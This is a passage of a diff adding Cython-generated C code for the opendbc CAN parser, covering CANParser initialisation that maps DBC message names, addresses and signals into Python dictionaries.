__Pyx_GIVEREF(__pyx_t_8); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_8); + __pyx_t_8 = 0; + __Pyx_INCREF(__pyx_kp_u_); + __pyx_t_5 += 2; + __Pyx_GIVEREF(__pyx_kp_u_); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_kp_u_); + __pyx_t_8 = __Pyx_PyObject_CallOneArg(__pyx_builtin_hex, __pyx_cur_scope->__pyx_v_addr); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_9 = __Pyx_PyObject_FormatSimple(__pyx_t_8, __pyx_empty_unicode); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_t_6 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_9) > __pyx_t_6) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_9) : __pyx_t_6; + __pyx_t_5 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_9); + __Pyx_GIVEREF(__pyx_t_9); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_t_9); + __pyx_t_9 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_5 += 1; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_kp_u__2); + __pyx_t_9 = __Pyx_PyUnicode_Join(__pyx_t_4, 4, __pyx_t_5, __pyx_t_6); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_t_9))) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_r); __pyx_r = 0; + __Pyx_Generator_Replace_StopIteration(0); + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_9); + __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + #if !CYTHON_USE_EXC_INFO_STACK + __Pyx_Coroutine_ResetAndClearException(__pyx_generator); + #endif + __pyx_generator->resume_label = -1; + __Pyx_Coroutine_clear((PyObject*)__pyx_generator); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} +static PyObject *__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___5generator1(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ + +/* "opendbc/can/parser_pyx.pyx":98 + * signal_options_v.push_back(spo) + * + * message_options = dict((address, 0) for _, address in signals) # <<<<<<<<<<<<<< + * message_options.update(dict(checks)) + * + */ + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8__init___3genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *__pyx_cur_scope; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("genexpr", 0); + __pyx_cur_scope = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *)__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr(__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr, __pyx_empty_tuple, NULL); + if (unlikely(!__pyx_cur_scope)) { + __pyx_cur_scope = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *)Py_None); + __Pyx_INCREF(Py_None); + __PYX_ERR(0, 98, __pyx_L1_error) + } else { + __Pyx_GOTREF((PyObject *)__pyx_cur_scope); + } + __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; + __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); + { + __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___5generator1, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_init___locals_genexpr, __pyx_n_s_opendbc_can_parser_pyx); if (unlikely(!gen)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_DECREF(__pyx_cur_scope); + __Pyx_RefNannyFinishContext(); + return (PyObject *) gen; + } + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__init__.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_DECREF((PyObject *)__pyx_cur_scope); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___5generator1(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ +{ + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *__pyx_cur_scope = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *)__pyx_generator->closure); + PyObject *__pyx_r = NULL; + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *(*__pyx_t_8)(PyObject *); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("genexpr", 0); + switch (__pyx_generator->resume_label) { + case 0: goto __pyx_L3_first_run; + default: /* CPython raises the right error here */ + __Pyx_RefNannyFinishContext(); + return NULL; + } + __pyx_L3_first_run:; + if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 98, __pyx_L1_error) + __pyx_r = PyDict_New(); if (unlikely(!__pyx_r)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_r); + if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 98, __pyx_L1_error) } + if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { + __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 98, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 98, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 98, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 98, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + if ((likely(PyTuple_CheckExact(__pyx_t_4))) || (PyList_CheckExact(__pyx_t_4))) { + PyObject* sequence = __pyx_t_4; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(0, 98, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + if (likely(PyTuple_CheckExact(sequence))) { + __pyx_t_5 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_6 = PyTuple_GET_ITEM(sequence, 1); + } else { + __pyx_t_5 = PyList_GET_ITEM(sequence, 0); + __pyx_t_6 = PyList_GET_ITEM(sequence, 1); + } + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(__pyx_t_6); + #else + __pyx_t_5 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + #endif + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } else { + Py_ssize_t index = -1; + __pyx_t_7 = PyObject_GetIter(__pyx_t_4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); + index = 0; __pyx_t_5 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_5)) goto __pyx_L6_unpacking_failed; + __Pyx_GOTREF(__pyx_t_5); + index = 1; __pyx_t_6 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_6)) goto __pyx_L6_unpacking_failed; + __Pyx_GOTREF(__pyx_t_6); + if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 98, __pyx_L1_error) + __pyx_t_8 = NULL; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L7_unpacking_done; + __pyx_L6_unpacking_failed:; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_8 = NULL; + if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); + __PYX_ERR(0, 98, __pyx_L1_error) + __pyx_L7_unpacking_done:; + } + __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v__); + __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v__, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + __pyx_t_5 = 0; + __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_address); + __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_address, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + __pyx_t_6 = 0; + if (unlikely(PyDict_SetItem(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_address, (PyObject*)__pyx_int_0))) __PYX_ERR(0, 98, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_r); __pyx_r = 0; + __Pyx_Generator_Replace_StopIteration(0); + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + #if !CYTHON_USE_EXC_INFO_STACK + __Pyx_Coroutine_ResetAndClearException(__pyx_generator); + #endif + __pyx_generator->resume_label = -1; + __Pyx_Coroutine_clear((PyObject*)__pyx_generator); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":31 + * string dbc_name + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): # <<<<<<<<<<<<<< + * if checks is None: + * checks = [] + */ + +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser___init__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self, PyObject *__pyx_v_dbc_name, PyObject *__pyx_v_signals, PyObject *__pyx_v_checks, PyObject *__pyx_v_bus, PyObject *__pyx_v_enforce_checks) { + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *__pyx_cur_scope; + PyObject *__pyx_v_msg_name_to_address = NULL; + PyObject *__pyx_v_msg_address_to_signals = NULL; + std::vector ::size_type __pyx_v_i; + struct Msg __pyx_v_msg; + PyObject *__pyx_v_name = NULL; + struct Signal __pyx_v_sig; + PyObject *__pyx_v_s = NULL; + PyObject *__pyx_v_address = NULL; + PyObject *__pyx_v_c = NULL; + PyObject *__pyx_v_checked_addrs = NULL; + PyObject *__pyx_v_signal_addrs = NULL; + PyObject *__pyx_v_unchecked = NULL; + PyObject *__pyx_v_err_msg = NULL; + std::vector __pyx_v_signal_options_v; + struct SignalParseOptions __pyx_v_spo; + PyObject *__pyx_v_sig_name = NULL; + PyObject *__pyx_v_sig_address = NULL; + PyObject *__pyx_v_message_options = NULL; + std::vector __pyx_v_message_options_v; + struct MessageParseOptions __pyx_v_mpo; + PyObject *__pyx_v_msg_address = NULL; + PyObject *__pyx_v_freq = NULL; + PyObject *__pyx_7genexpr__pyx_v_c = NULL; + PyObject *__pyx_8genexpr1__pyx_v_s = NULL; + PyObject *__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___2generator = 0; + PyObject *__pyx_gb_7opendbc_3can_10parser_pyx_9CANParser_8__init___5generator1 = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + std::string __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + std::vector ::size_type __pyx_t_5; + std::vector ::size_type __pyx_t_6; + std::vector ::size_type __pyx_t_7; + std::vector ::iterator __pyx_t_8; + struct Signal __pyx_t_9; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + int __pyx_t_12; + Py_ssize_t __pyx_t_13; + Py_ssize_t __pyx_t_14; + Py_ssize_t __pyx_t_15; + Py_UCS4 __pyx_t_16; + int __pyx_t_17; + PyObject *(*__pyx_t_18)(PyObject *); + PyObject *__pyx_t_19 = NULL; + PyObject *(*__pyx_t_20)(PyObject *); + uint32_t __pyx_t_21; + int __pyx_t_22; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + __pyx_cur_scope = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *)__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__(__pyx_ptype_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__, __pyx_empty_tuple, NULL); + if (unlikely(!__pyx_cur_scope)) { + __pyx_cur_scope = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *)Py_None); + __Pyx_INCREF(Py_None); + __PYX_ERR(0, 31, __pyx_L1_error) + } else { + __Pyx_GOTREF((PyObject *)__pyx_cur_scope); + } + __pyx_cur_scope->__pyx_v_self = __pyx_v_self; + __Pyx_INCREF((PyObject *)__pyx_cur_scope->__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_cur_scope->__pyx_v_self); + __Pyx_INCREF(__pyx_v_checks); + + /* "opendbc/can/parser_pyx.pyx":32 + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): + * if checks is None: # <<<<<<<<<<<<<< + * checks = [] + * + */ + __pyx_t_1 = (__pyx_v_checks == Py_None); + if (__pyx_t_1) { + + /* "opendbc/can/parser_pyx.pyx":33 + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): + * if checks is None: + * checks = [] # <<<<<<<<<<<<<< + * + * self.dbc_name = dbc_name + */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 33, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF_SET(__pyx_v_checks, __pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":32 + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): + * if checks is None: # <<<<<<<<<<<<<< + * checks = [] + * + */ + } + + /* "opendbc/can/parser_pyx.pyx":35 + * checks = [] + * + * self.dbc_name = dbc_name # <<<<<<<<<<<<<< + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + */ + __pyx_t_3 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 35, __pyx_L1_error) + __pyx_cur_scope->__pyx_v_self->dbc_name = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_3); + + /* "opendbc/can/parser_pyx.pyx":36 + * + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) # <<<<<<<<<<<<<< + * if not self.dbc: + * raise RuntimeError(f"Can't find DBC: {dbc_name}") + */ + __pyx_t_3 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 36, __pyx_L1_error) + __pyx_cur_scope->__pyx_v_self->dbc = dbc_lookup(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_3)); + + /* "opendbc/can/parser_pyx.pyx":37 + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: # <<<<<<<<<<<<<< + * raise RuntimeError(f"Can't find DBC: {dbc_name}") + * + */ + __pyx_t_1 = (!(__pyx_cur_scope->__pyx_v_self->dbc != 0)); + if (unlikely(__pyx_t_1)) { + + /* "opendbc/can/parser_pyx.pyx":38 + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + * raise RuntimeError(f"Can't find DBC: {dbc_name}") # <<<<<<<<<<<<<< + * + * self.vl = {} + */ + __pyx_t_2 = __Pyx_PyObject_FormatSimple(__pyx_v_dbc_name, __pyx_empty_unicode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Can_t_find_DBC, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 38, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 38, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":37 + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: # <<<<<<<<<<<<<< + * raise RuntimeError(f"Can't find DBC: {dbc_name}") + * + */ + } + + /* "opendbc/can/parser_pyx.pyx":40 + * raise RuntimeError(f"Can't find DBC: {dbc_name}") + * + * self.vl = {} # <<<<<<<<<<<<<< + * self.vl_all = {} + * self.ts_nanos = {} + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_cur_scope->__pyx_v_self->vl); + __Pyx_DECREF(__pyx_cur_scope->__pyx_v_self->vl); + __pyx_cur_scope->__pyx_v_self->vl = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":41 + * + * self.vl = {} + * self.vl_all = {} # <<<<<<<<<<<<<< + * self.ts_nanos = {} + * msg_name_to_address = {} + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_cur_scope->__pyx_v_self->vl_all); + __Pyx_DECREF(__pyx_cur_scope->__pyx_v_self->vl_all); + __pyx_cur_scope->__pyx_v_self->vl_all = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":42 + * self.vl = {} + * self.vl_all = {} + * self.ts_nanos = {} # <<<<<<<<<<<<<< + * msg_name_to_address = {} + * msg_address_to_signals = {} + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_cur_scope->__pyx_v_self->ts_nanos); + __Pyx_DECREF(__pyx_cur_scope->__pyx_v_self->ts_nanos); + __pyx_cur_scope->__pyx_v_self->ts_nanos = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":43 + * self.vl_all = {} + * self.ts_nanos = {} + * msg_name_to_address = {} # <<<<<<<<<<<<<< + * msg_address_to_signals = {} + * + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 43, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_v_msg_name_to_address = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":44 + * self.ts_nanos = {} + * msg_name_to_address = {} + * msg_address_to_signals = {} # <<<<<<<<<<<<<< + * + * for i in range(self.dbc[0].msgs.size()): + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 44, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_v_msg_address_to_signals = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":46 + * msg_address_to_signals = {} + * + * for i in range(self.dbc[0].msgs.size()): # <<<<<<<<<<<<<< + * msg = self.dbc[0].msgs[i] + * name = msg.name.decode("utf8") + */ + __pyx_t_5 = (__pyx_cur_scope->__pyx_v_self->dbc[0]).msgs.size(); + __pyx_t_6 = __pyx_t_5; + for (__pyx_t_7 = 0; __pyx_t_7 < __pyx_t_6; __pyx_t_7+=1) { + __pyx_v_i = __pyx_t_7; + + /* "opendbc/can/parser_pyx.pyx":47 + * + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] # <<<<<<<<<<<<<< + * name = msg.name.decode("utf8") + * + */ + __pyx_v_msg = ((__pyx_cur_scope->__pyx_v_self->dbc[0]).msgs[__pyx_v_i]); + + /* "opendbc/can/parser_pyx.pyx":48 + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] + * name = msg.name.decode("utf8") # <<<<<<<<<<<<<< + * + * msg_name_to_address[name] = msg.address + */ + __pyx_t_2 = __Pyx_decode_cpp_string(__pyx_v_msg.name, 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_name, __pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":50 + * name = msg.name.decode("utf8") + * + * msg_name_to_address[name] = msg.address # <<<<<<<<<<<<<< + * msg_address_to_signals[msg.address] = set() + * for sig in msg.sigs: + */ + __pyx_t_2 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (unlikely((PyDict_SetItem(__pyx_v_msg_name_to_address, __pyx_v_name, __pyx_t_2) < 0))) __PYX_ERR(0, 50, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":51 + * + * msg_name_to_address[name] = msg.address + * msg_address_to_signals[msg.address] = set() # <<<<<<<<<<<<<< + * for sig in msg.sigs: + * msg_address_to_signals[msg.address].add(sig.name.decode("utf8")) + */ + __pyx_t_2 = PySet_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 51, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 51, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely((PyDict_SetItem(__pyx_v_msg_address_to_signals, __pyx_t_4, __pyx_t_2) < 0))) __PYX_ERR(0, 51, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":52 + * msg_name_to_address[name] = msg.address + * msg_address_to_signals[msg.address] = set() + * for sig in msg.sigs: # <<<<<<<<<<<<<< + * msg_address_to_signals[msg.address].add(sig.name.decode("utf8")) + * + */ + __pyx_t_8 = __pyx_v_msg.sigs.begin(); + for (;;) { + if (!(__pyx_t_8 != __pyx_v_msg.sigs.end())) break; + __pyx_t_9 = *__pyx_t_8; + ++__pyx_t_8; + __pyx_v_sig = __pyx_t_9; + + /* "opendbc/can/parser_pyx.pyx":53 + * msg_address_to_signals[msg.address] = set() + * for sig in msg.sigs: + * msg_address_to_signals[msg.address].add(sig.name.decode("utf8")) # <<<<<<<<<<<<<< + * + * self.address_to_msg_name[msg.address] = name + */ + __pyx_t_4 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_10 = __Pyx_PyDict_GetItem(__pyx_v_msg_address_to_signals, __pyx_t_4); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_10, __pyx_n_s_add); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __pyx_t_10 = __Pyx_decode_cpp_string(__pyx_v_sig.name, 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_11 = NULL; + __pyx_t_12 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_11)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_11); + 